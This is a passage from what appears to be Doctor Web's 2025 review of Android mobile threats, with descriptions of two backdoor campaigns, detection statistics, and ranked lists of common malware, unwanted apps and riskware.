&lt;p&gt;In August, we &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;reported&lt;/a&gt; on cases of the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; backdoor being distributed via direct messages in popular messaging apps. The attackers offered potential victims an “anti-virus” that could be installed from the APK file attached to the messages. This file was, in fact, concealed malware. Our anti-virus laboratory discovered the first &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; versions in January 2025 and has been monitoring their activity ever since, which allowed us to quickly identify this campaign.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; misleads users by imitating the operation of an anti-virus&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When installed on an Android device, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; allows confidential information to be stolen and users to be spied on. For instance, via this backdoor, threat actors can listen to conversations, broadcast from a device’s camera, track geolocation, and steal content from messengers and browsers. Moreover, &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; implements keylogger functionality to intercept entered text, including passwords. According to our experts, the backdoor is used in targeted attacks and is not intended for mass distribution. The primary target for cybercriminals is employees of Russian companies.&lt;/p&gt;

&lt;p&gt;In October, Doctor Web &lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;published&lt;/a&gt; information on the multi-functional backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, which our malware analysts discovered in modified versions of the Telegram X messenger. Its main distribution channel was malicious websites to which potential victims are directed through ads in mobile programs. On such sites, users are encouraged to install Telegram X, supposedly to find a partner for conversation and dating. These Internet resources primarily target residents of Indonesia and Brazil. At the same time, we also detected this backdoor in a number of third-party Android app catalogs.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a malicious website from which the trojan version of Telegram X was downloaded&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;’s tasks is to steal confidential data. For example, the malicious program steals the login and password for the victim’s Telegram account, the messenger’s chat history, incoming SMS, and the phone book contacts; it can also intercept the clipboard contents. However, threat actors use it not only as a spyware tool. With the help of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, they can effectively control both the hacked account and the messenger itself, altering its functionality. For instance, the backdoor allows threat actors to covertly add and remove users from Telegram channels, join conversations on their behalf, and conceal devices authorized for their account. To perform actions that require changing the app’s operating logic, the Xposed framework is used. Cybercriminals control the backdoor both in the traditional way, via a C2 server, and by sending commands through a Redis database, something not seen previously in other Android malware. The total number of devices infected with &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; exceeded 58,000, while over 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers, were affected.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Countries with the highest number of devices infected with &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Statistics&lt;/h3&gt;

&lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, the most common Android threats in 2025 were various malicious programs. Users encountered them in 81.11% of cases. These were followed by potentially dangerous apps, whose share was 10.73%. Adware apps, detected in 5.89% of cases, ranked third. Unwanted programs were the least detected threats as they accounted for 2.27% of detections.&lt;/p&gt;

&lt;p&gt;Compared to the previous year, the share of malicious and potentially dangerous programs increased, while the share of unwanted software and adware decreased.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Malicious programs&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;For several years, ad-displaying trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family have been the most commonly detected malware. In 2025, the situation did not change, although over the course of the last 12 months, their share slightly decreased from 31.95% to 27.42%.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;These trojans display intrusive ads in the form of full-screen banners and videos. To make it harder for users to detect and delete them from their infected devices, such malicious programs try to “hide” after installation. For example, they can conceal or substitute their icons in the home screen menu.&lt;/p&gt;

&lt;p&gt;The most active member of this family, accounting for more than a third of detections, was &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;. This trojan came to the attention of our virus analysts back in 2024, and has been in the lead ever since. &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; is one of many variants of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;, a malicious app known since 2021. Several new versions of the latter, like &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;, were also distributed in 2025. It is possible that over time they may also rise to the top positions, as previously happened with other &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; modifications.&lt;/p&gt;

&lt;p&gt;Over the course of 2025, users again encountered Aegis, a subfamily of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. But the share of such trojans in the total number of times the family was detected significantly decreased—from 17.37% to 3.11%. These trojans can automatically run after installation. Among the most active variants were &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds.Aegis&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;The second most common malware programs were the ad-displaying trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, whose share increased from 5.38% to 15.64%. &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt; was the top modification among them. These trojans were followed by &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;—fake programs that cybercriminals use for fraudulent purposes. &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malware can load various websites instead of providing the declared functionality. Such trojans accounted for 10.94% of detections, which is lower than the 2024 figure, when their share was 18.28%. Such a decrease was, in part, due to the fact that the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt; trojan was less active. However, this malicious program still remains the most widespread member of the family. Its main task is to load online casino websites.&lt;/p&gt;

&lt;p&gt;The share of trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy&amp;lng=en"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; family, which implement a variety of spyware functionality, decreased from 11.52% to 3.09%. At the same time, the activity of banking trojans increased. Their share of the total number of malware detections was 6.94%, compared to 6.29% a year earlier.&lt;/p&gt;

&lt;p&gt;In 2025, the number of software packer detections increased from 5.49% to 6.01%. Threat actors can use such instruments to shield malware from detection and analysis. Malicious apps containing the packer &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt; were most commonly detected on protected devices.&lt;/p&gt;

&lt;p&gt;Various malicious WhatsApp messenger mods were also widespread. Among them were modifications (Dr.Web detects them as &lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;) that load websites without the victims noticing. Multi-functional trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; family also increased their activity—from 2.74% to 7.48%. Cybercriminals can embed such trojans into the firmware of Android devices.&lt;/p&gt;

&lt;p&gt;The ten malicious programs most commonly detected in 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app that displays obnoxious ads; in fact it is a software module that developers incorporate into their applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious WhatsApp messenger mods that can covertly load various websites in the background.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious apps that are packed with a popular commercial code obfuscator.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a packer for &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with the malicious Telegram messenger mods in which these trojans are embedded.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Unwanted software&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; apps were once again the most widespread unwanted software of 2025, accounting for 51.96% of detections. These programs offer users a reward for completing certain tasks and supposedly allow them to convert the reward into real money. In reality, no actual payouts are made. Along with &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, other similar programs, like &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, also became widespread. However, users encountered them much less frequently.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; apps, which imitate the operation of anti-virus software and detect non-existent threats, were in second place with a share of 10.37%. In order for the infection to be “cured”, they encourage users to buy the full version of the software.&lt;/p&gt;

&lt;p&gt;With a share of 6.41%, &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; apps, which are modified in the CloudInject cloud service, were the third most frequently encountered unwanted software. Their variants, detected as &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, came in close behind in fourth place with 5.08%. Such programs are modified directly on a remote server; access to the service is provided by the utility &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;, which is only a shell for working with it. During modification, dangerous system permissions and obfuscated code are added to the apps. Moreover, modders can remotely control the modified apps via the CloudInject service: for example, they can lock an app and demand that a code be entered before it can be used further.&lt;/p&gt;

&lt;p&gt;In 2025, there was a slight increase in the number of apps detected that can be utilized to monitor users and control their activity. In the hands of malicious actors, such instruments become spyware. For example, the share of the &lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; app and its variant, &lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;, increased from 2.40% to 2.91% and from 0.21% to 0.97%, respectively. The share of &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; increased from 2.03% to 2.56%, and its variant &lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; increased from 0.90% to 1.02%. &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;'s figure increased from 0.31% to 1.01%.&lt;/p&gt;

&lt;p&gt;The ten unwanted programs most commonly detected in 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Riskware&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;In 2025, the most widespread potentially dangerous software was apps modified using NP Manager, a tool for modifying programs that contains various modules for obfuscating and protecting the apps’ code and for bypassing digital signature verification after changes have been made. Threat actors often use this tool to protect malicious programs and make them harder for anti-viruses to detect. Compared to 2024, the share of such apps increased from 24.52% to 53.59%, so they accounted for more than half of all riskware detections. Most commonly detected on protected devices were the variants &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32.85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12.61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3.02%), and &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2.31%).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; programs—frameworks for developing Android apps in the Lua programming language—were detected more frequently. Their share is now 8.11%, up from 3.93%. Such frameworks require many system permissions, including permission to use the Accessibility Service. Programs created with their help are based on Lua scripts that are encrypted and then decrypted right before execution. Such scripts can potentially be malicious. The share of apps modified with &lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt; increased from 8.16% to 10.06%. This utility modifies installed apps by downloading specially prepared scripts from the Internet.&lt;/p&gt;

&lt;p&gt;At the same time, the share of &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; utilities, which allow Android apps to be launched without installing them, decreased from 33.10% to 10.55%. The most commonly detected variants of this family in 2025 were &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4.66%), &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2.07%), and &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1.88%). In addition, the share of the programs protected with the software packer &lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; decreased from 13.17% to 2.58%.&lt;/p&gt;

&lt;p&gt;The ten riskware apps most commonly detected on protected Android devices in 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. This tool contains modules for obfuscating and protecting the apps’ code as well as for bypassing their digital signature verification after they are modified. The obfuscation it adds is often used in malware to make it more difficult to detect and analyze.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software in the Lua scripting language. The main logic of Lua-based apps resides in scripts that are stored encrypted and decrypted by the interpreter before execution. By default, this framework often requests a large number of system permissions in order to operate, including permission to use the Accessibility Service in Android. As a result, the Lua scripts that it executes can potentially perform various malicious actions within the acquired permissions.&lt;/dd&gt;
